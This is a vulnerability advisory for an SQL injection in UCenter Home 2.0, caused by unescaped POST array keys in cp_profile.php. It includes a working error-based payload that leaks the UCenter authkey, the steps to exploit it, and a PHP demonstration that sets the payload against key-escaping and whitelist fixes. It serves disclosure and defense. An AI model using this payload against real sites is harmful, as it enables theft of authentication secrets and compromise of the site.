Release date: 2011-01-23
Author: alibaba
Affected Version: UCenter Home 2.0
Official Website: Http://www.discuz.net
Vulnerability Type: SQL Injection
Vulnerability Description: When magic_quotes_gpc is off, UCenter Home 2.0 escapes only the values of the submitted parameters (through saddslashes()); the parameter names (array keys) are never filtered. A crafted key is therefore concatenated straight into an SQL statement, which yields SQL injection.
Code Analysis:
function_common.php:

    // SQL ADDSLASHES
    function saddslashes($string) {
        if (is_array($string)) {
            foreach ($string as $key => $val) {
                $string[$key] = saddslashes($val); // only the value is escaped; $key is left untouched
            }
        } else {
            $string = addslashes($string);
        }
        return $string;
    }
cp_profile.php, around line 56:

    // Privacy
    $inserts = array();
    foreach ($_POST['friend'] as $key => $value) {
        $value = intval($value);
        $inserts[] = "('base','$key','$space[uid]','$value')"; // $key is not filtered
    }
    if ($inserts) {
        $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'");
        $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type, subtype, uid, friend) VALUES ".implode(',', $inserts)); // the injection happens here
    }

Only $value goes through intval(); the array key is interpolated into the VALUES list as-is, so a single quote inside the key breaks out of the 'subtype' string literal.
Exploit:
Requirement: magic_quotes_gpc = Off
URL: cp.php?ac=profile&op=base
When saving the profile, add a POST parameter whose name is:
friend[a',(select 1 from (select count(*),concat((select concat(substring(authkey,)) from uc_applications limit),floor(rand(0)*2))x from information_schema.tables group by x)a),1)#]
Parameter value: arbitrary
I used the Tamper Data extension for Firefox to modify the POST request on the fly.
The quote in the key closes the 'subtype' literal, the subquery becomes a column value and the trailing # comments out the rest of the statement. The count(*)/floor(rand(0)*2) ... group by x construction forces a MySQL duplicate-entry error whose message contains the UCenter authkey from uc_applications.
Fix: filter the array keys as well as the values before they reach the SQL string (saddslashes() currently escapes values only), or restrict $key to the expected subtype names before building the VALUES list.
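The following PHP is an added illustration written for this page; it is not UCenter Home's own code nor the vendor's patch. It reproduces the VALUES construction from cp_profile.php with a constructed $_POST['friend'] array whose key carries the injection, and contrasts the original value-only escaping with two hardened variants: a saddslashes() that also escapes keys, and a whitelist of allowed subtype names. The uid (3), the table name (uchome_spaceinfo), the whitelist entries and the substring/limit arguments in the payload (1,62 and 0,1, which the advisory above leaves out) are assumptions.

```php
<?php
// Added example, not UCenter Home's own code. Assumed: $space['uid'] = 3,
// table uchome_spaceinfo, whitelist of field names, payload substring/limit args.

// The original helper: it recurses into values only, so array keys stay raw.
function saddslashes_values_only($string) {
    if (is_array($string)) {
        foreach ($string as $key => $val) {
            $string[$key] = saddslashes_values_only($val);
        }
    } else {
        $string = addslashes($string);
    }
    return $string;
}

// Hardened variant (assumed fix): escape the keys as well as the values.
function saddslashes_keys_and_values($string) {
    if (is_array($string)) {
        $clean = array();
        foreach ($string as $key => $val) {
            $clean[addslashes($key)] = saddslashes_keys_and_values($val);
        }
        return $clean;
    }
    return addslashes($string);
}

// Stricter variant (assumed fix): only accept known subtype names and
// integer values, so nothing attacker-controlled is interpolated at all.
function filter_friend_keys(array $friend, array $allowed) {
    $out = array();
    foreach ($friend as $key => $value) {
        if (in_array((string)$key, $allowed, true)) {
            $out[$key] = intval($value);
        }
    }
    return $out;
}

// Mirrors the VALUES construction in cp_profile.php (op=base).
function build_insert(array $friend, $uid) {
    $inserts = array();
    foreach ($friend as $key => $value) {
        $value = intval($value);
        $inserts[] = "('base','$key','$uid','$value')";
    }
    return "INSERT INTO uchome_spaceinfo (type, subtype, uid, friend) VALUES "
         . implode(',', $inserts);
}

// Constructed attacker input: the parameter NAME carries the payload.
// The error-based trick: count(*) grouped by a value built from rand(0)
// collides, and MySQL's "Duplicate entry ... for key 'group_key'" message
// echoes the concatenated authkey fragment back to the attacker.
$payload_key = "a',(select 1 from (select count(*),concat((select substring(authkey,1,62)"
             . " from uc_applications limit 0,1),floor(rand(0)*2))x"
             . " from information_schema.tables group by x)a),1)#";
$post_friend = array($payload_key => "0", "realname" => "1");
$allowed     = array("realname", "sex", "birthday"); // assumed field names
$uid         = 3;

// 1) value-only escaping: the key's quote ends the 'subtype' literal and the
//    subquery runs as a column expression; '#' discards the rest.
echo build_insert(saddslashes_values_only($post_friend), $uid), "\n";

// 2) keys escaped too: the payload stays inside one string literal ('a\',...').
echo build_insert(saddslashes_keys_and_values($post_friend), $uid), "\n";

// 3) whitelist: the injected key is dropped; only ('base','realname','3','1') remains.
echo build_insert(filter_friend_keys($post_friend, $allowed), $uid), "\n";
```

Run it with php and compare the three INSERT statements printed: the first contains a live subquery in the VALUES list, the second keeps the whole key inside a quoted literal, and the third never lets the key reach the SQL text. Escaping keys is the minimal fix that keeps the existing data model; the whitelist is the stronger one, since subtype names are a fixed set that the application knows in advance.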